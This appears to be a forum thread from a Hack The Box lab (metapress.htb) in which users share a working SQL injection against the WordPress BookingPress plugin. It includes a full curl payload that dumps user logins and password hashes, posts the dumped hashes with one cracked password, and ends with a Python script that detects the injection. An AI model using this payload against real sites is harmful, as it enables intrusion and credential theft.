Posts: 74 Threads: 0 Joined: N/A
October 29, 2022 at 6:56 PM

Good luck everyone!

Posts: 16 Threads: 0 Joined: N/A
October 29, 2022 at 6:59 PM

(October 29, 2022, 06:56 PM) 11231123 Wrote:
> Good luck everyone!

glgl

Posts: 6 Threads: 0 Joined: N/A
October 29, 2022 at 7:22 PM

This appears to be working. Was able to grab DB information.
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

Posts: 16 Threads: 0 Joined: N/A
October 29, 2022 at 7:26 PM

(October 29, 2022, 07:22 PM) lightspeeder Wrote:
> This appears to be working. Was able to grab DB information.
> https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

not really

Posts: 74 Threads: 0 Joined: N/A
October 29, 2022 at 7:36 PM

(October 29, 2022, 07:26 PM) elliotal53 Wrote:
> not really

Works for me:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar

Posts: 16 Threads: 0 Joined: N/A
October 29, 2022 at 7:40 PM

(October 29, 2022, 07:36 PM) 11231123 Wrote:
> Works for me:
> admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
> manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar

how did you get it to work? mind explaining a bit more?

Posts: 74 Threads: 0 Joined: N/A
October 29, 2022 at 7:50 PM

(October 29, 2022, 07:40 PM) elliotal53 Wrote:
> how did you get it to work? mind explaining a bit more?

Get a nonce and then just:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

Posts: 16 Threads: 0 Joined: N/A
October 29, 2022 at 7:55 PM

(October 29, 2022, 07:50 PM) 11231123 Wrote:
> Get a nonce and then just:
> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
>   --data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

{"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}

Posts: 166 Threads: 0 Joined: N/A
October 29, 2022 at 7:56 PM

(October 29, 2022, 07:50 PM) 11231123 Wrote:
> Get a nonce and then just:
> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
>   --data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

wow this worked? here i get Sorry, Your request can not process due to security reason.

Posts: 24 Threads: 0 Joined: N/A
October 29, 2022 at 7:58 PM

(October 29, 2022, 07:55 PM) elliotal53 Wrote:
> {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}

you have to use the proper nonce value
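
A defender-side check for the request shape posted in this thread, as an added example that is not part of any post or of the plugin's code: it flags admin-ajax.php POST bodies for the bookingpress_front_get_category_services action whose category_id or total_service is not a plain integer. It assumes request bodies are available (for instance from a WAF or audit log) and that both parameters are meant to be non-negative integers; the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Handler and parameter names come from the request quoted in the thread.
TARGET_ACTION = "bookingpress_front_get_category_services"
# Assumption: both parameters are meant to carry non-negative integers only.
NUMERIC_PARAMS = ("category_id", "total_service")
INT_RE = re.compile(r"\d{1,10}", re.ASCII)
# Tokens that have no place in a numeric field; used only to label the finding.
SQL_HINT_RE = re.compile(r"\b(union|select|from|group_concat)\b|--|@@", re.I)


def inspect_body(body: str) -> list[str]:
    """Return findings for one URL-encoded admin-ajax.php POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # also percent-decodes
    if TARGET_ACTION not in fields.get("action", []):
        return []  # a different AJAX handler; out of scope for this check
    findings = []
    for name in NUMERIC_PARAMS:
        for value in fields.get(name, []):
            if INT_RE.fullmatch(value):
                continue
            kind = "sql-syntax" if SQL_HINT_RE.search(value) else "non-integer"
            findings.append(f"{name}:{kind}")
    return findings


def scan(bodies):
    """Map the index of each flagged body to its findings."""
    return {i: f for i, b in enumerate(bodies) if (f := inspect_body(b))}


# Constructed sample bodies (not captured traffic); <nonce> is a placeholder.
PREFIX = "action=bookingpress_front_get_category_services&_wpnonce=<nonce>"
SAMPLES = [
    PREFIX + "&category_id=33&total_service=4",
    PREFIX + "&category_id=33&total_service=-1) UNION ALL SELECT 1,2,3-- -",
    PREFIX + "&category_id=abc&total_service=4",
    "action=heartbeat&_wpnonce=<nonce>&total_service=x",
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLES).items():
        print(idx, found)
```

The same integer-only rule applied server-side, before the value reaches a query, is what closes the hole; the detector only surfaces attempts.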